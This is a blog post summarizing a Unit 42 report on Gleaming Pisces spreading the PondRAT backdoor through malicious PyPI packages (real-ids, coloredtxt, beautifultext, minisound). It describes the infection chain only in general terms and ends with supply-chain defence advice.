By 
North Korea-linked group Gleaming Pisces APT infiltrates Python’s PyPI repository with malicious packages, aiming to infect developers and compromise supply chains.
Unit 42 researchers have recently uncovered an ongoing campaign where the North Korea-linked APT group, Gleaming Pisces (also known as Citrine Sleet), is distributing the new PondRAT backdoor through infected Python packages. This brilliant campaign poses a significant threat, as the attackers are infecting packages in the Python Package Index (PyPI) repository, and use it to spread across supply chains.
Gleaming Pisces, the group that is active since at least 2018, is notorious for sophisticated attacks targeting mostly the cryptocurrency industry.
The malicious packages identified in the PyPI repository include:
- real-ids (893 downloads, versions 0.0.3 – 0.0.5)
- coloredtxt (381 downloads, version 0.0.2)
- beautifultext (736 downloads, version 0.0.1)
- minisound (416 downloads, version 0.0.2)
Although these packages have been removed, their downloads indicate potential widespread impact, but we cannot accurately predict it.
PondRAT: A Lighter Variant of POOLRAT
PondRAT appears to be a streamlined version of POOLRAT (also known as SIMPLESEA), a macOS remote administration tool previously distributed by the same threat actor. Palo alto analysis shows that PondRAT shares significant code similarities with POOLRAT, including overlapping structures, identical function names, encryption keys, and similar execution flows. Basically a fork of previous project, makes me want to make a joke, do threat actors work in sprints, using jira? Lol.
The malware supports basic commands such as uploading and downloading files, and executing commands with output retrieval. Despite its limited functionality compared to POOLRAT, for maintaining unauthorized access to compromised systems, this software proves more than enough. Going by the saying, less is more. Less features, less size, easier to transfer rapidly.
Infection Chain and Attack Methodology
The attack starts when a developer installs one of the poisoned Python packages. Upon installation, the malicious package executes code that runs several bash commands to download the PondRAT backdoor, modify its permissions, and execute it. This process allows the attackers to establish a foothold in the developer’s system without immediate detection.
Preventive Measures
Developers are encouraged to test (at least audit) the packages they incorporate into their projects carefully. Verifying checksums and using signed packages can help sstreamline the process and ensure integrity.
Organizations should conduct frequent security assessments of their software supply chains to identify and mitigate potential vulnerabilities.
Conclusion
The evidence of additional Linux variants of POOLRAT shows that Gleaming Pisces has been enhancing its capabilities across both Linux and macOS platforms
Concludes the Unit 42 report. The cross-platform capability, proves again how sophisticated the malicious tools get with each iteration.
While I might not be able to resist a joke or two, this campaign is extremely serious and is not the first to target developers. This time, the focus was on Python, whereas previous campaigns targeted the JavaScript Node.js ecosystem. It raises concerns about how many similar operations are active or attempting to infiltrate other platforms. Once an attacker gains access to a developer’s machine, robust protection measures must be in place, as even then, entire networks remain at risk.
Source: https://unit42.paloaltonetworks.com/gleaming-pisces-applejeus-poolrat-and-pondrat/
Photo by Christina Morillo: https://www.pexels.com/photo/python-book-1181671/